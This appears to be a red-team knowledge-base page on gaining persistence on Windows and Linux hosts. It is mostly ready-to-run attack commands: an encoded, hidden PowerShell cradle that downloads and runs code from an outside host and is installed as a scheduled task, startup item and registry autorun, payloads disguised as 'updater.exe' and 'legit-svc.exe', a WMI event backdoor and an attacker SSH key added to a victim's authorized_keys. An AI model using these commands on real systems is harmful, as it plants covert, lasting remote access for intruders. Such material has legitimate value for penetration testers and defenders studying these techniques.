Malleum Knowledge Base

5. Host Persistance

3 min read

  • HKCU / HKLM Registry Autoruns
  • Scheduled Tasks
  • Startup Folder

Current User Persistance

Task Scheduler

The Windows Task Scheduler allows us to create “tasks” that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.

Let’s create a scheduled task that will execute a PowerShell payload once every hour.  To save ourselves from having to deal with lots of quotations in the IEX cradle, we can encode it to base64 and execute it using the -EncodedCommand parameter in PowerShell (often appreciated to -enc).  This is a little complicated to do, because it must use Unicode encoding (rather than UTF8 or ASCII).

Creating payload

Powershell
$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
Linux
ubuntu@DESKTOP-3BSK7NO ~> set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
ubuntu@DESKTOP-3BSK7NO ~> echo -en $str | iconv -t UTF-16LE | base64 -w 0

Exploitation of Scheduled Task

 C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly

Where:

  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also removecheck and list).
  • -o is the task frequency.

Startup Folder

Applications, files and shortcuts within a user’s startup folder are launched automatically when they first log in. It’s commonly used to bootstrap the user’s home environment (set wallpapers, shortcut’s etc).

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

Registry Autorun

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

Hunting for COM Hijacks

System User Persistance

there are many Windows services that run as SYSTEM.  Our various means of exploiting services for privilege escalation also act as persistence, but at the cost of breaking the legitimate service.  Instead, we can create our own service which won’t impact on existing services.a

Windows Services

beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

WMI Event Subscribtion

Persistence via WMI events can be achieved by leveraging the following three classes:

  • EventConsumer

  • EventFilter

  • FilterToConsumerBinding

An EventConsumer is the action that we want to perform - in this case, to execute a payload.  This can be via OS commands (such as a PowerShell one-liner) or VBScript.

An EventFilter is a trigger that we can act upon.  Any arbitrary WMI query can be used as a filter which provides practically unlimited options.  These can include when a particular process starts, when a user logs in, when a USB device is inserted, any specific time of day or on a timed interval.  

The FilterToConsumerBinding simply links an EventConsumer and EventFilter together.

PowerLurk is a PowerShell tool for building these WMI events.


beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe (payload)
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor.  The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe; and query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

Open notepad on Workstation 2 and the DNS Beacon will appear.

Linux

SSH persistence

On client machine

ssh-keygen

On victim machine

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/linuxvictim/.ssh/authorized_keys

On client machine

ssh linuxvictim@linuxvictim

Graph View